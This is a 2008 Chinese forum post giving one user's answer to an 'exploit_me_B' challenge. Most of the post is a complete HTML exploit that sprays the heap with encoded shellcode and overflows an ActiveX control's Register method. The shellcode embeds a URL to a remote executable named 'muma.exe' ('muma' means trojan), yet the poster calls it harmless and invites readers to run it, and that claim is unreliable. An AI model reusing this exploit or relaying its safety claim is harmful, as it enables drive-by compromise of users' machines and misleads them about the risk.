-
-
[原创]我的exploit_me_B 答案
-
发表于:
2008-1-3 12:17
3262
-
<html>
<title>kyo test exploit</title>
<object classid="clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2" id='target'></object>
<body>
<SCRIPT language="JavaScript">
var shellcode = unescape("%u0EEB%u4A5A%uC933%uF1B1%u3480%u970A%uFAE2%u05EB%uEDE8%uFFFF%u16FF%u2f7b%u979c%u7c97%uc8d0%u36f3%u97a7%u9797%ud71c%u1c9b%u8be7%u1c3a%u9fff%u95fd%u7fce%u97d5%u9797%u6e75%ua4ff%u97a5%uff97%ue4e2%ue5f2%u68c3%u6fc0%u7f1c%ubc7f%u9797%ua497%uc757%uc0c0%u68c7%u6bc0%u57a4%u68c7%u6fc0%u5316%u9c57%u9797%uce7c%u237f%u6868%u1968%u99d9%ue97b%u754f%u3fe4%uda35%uf82b%u97fc%uc1c6%ue21c%u1cab%ub9e3%u94ef%uc162%ue11c%u94b7%ua462%ude5e%u3ad6%u5294%u4ca4%u2998%uad87%ue341%u569f%u9a5c%u4d94%u7cd7%uac66%ue288%uc970%uc91c%u94b3%uf14a%u9b1c%u1cdc%u8bc9%u4a94%u931c%u941c%u3c52%ucec9%u6854%u7474%u3A70%u2F2F%u6566%u676E%u6F67%u2E75%u656E%u2F74%u756D%u616D%u652E%u6578%u0000");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<300; x++) memory[x] = block +shellcode;
var buffer = '';
var buffer0='\x6B\x79\x6F\x33\x32\x37';
while (buffer.length < 264) buffer+='\x0a\x0a\x0a\x0a';
target.Register(buffer0,buffer);
</script>
</body>
</html>
这是我的html答案
看到其他几位朋友 又是SHELLCODE加载器 又是解码译码
我感到很困惑 有那么麻烦吗??
难道我这种只在我电脑上成功???
大家不妨可以测试下我这个!!是弹个OK的窗口,无害.
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!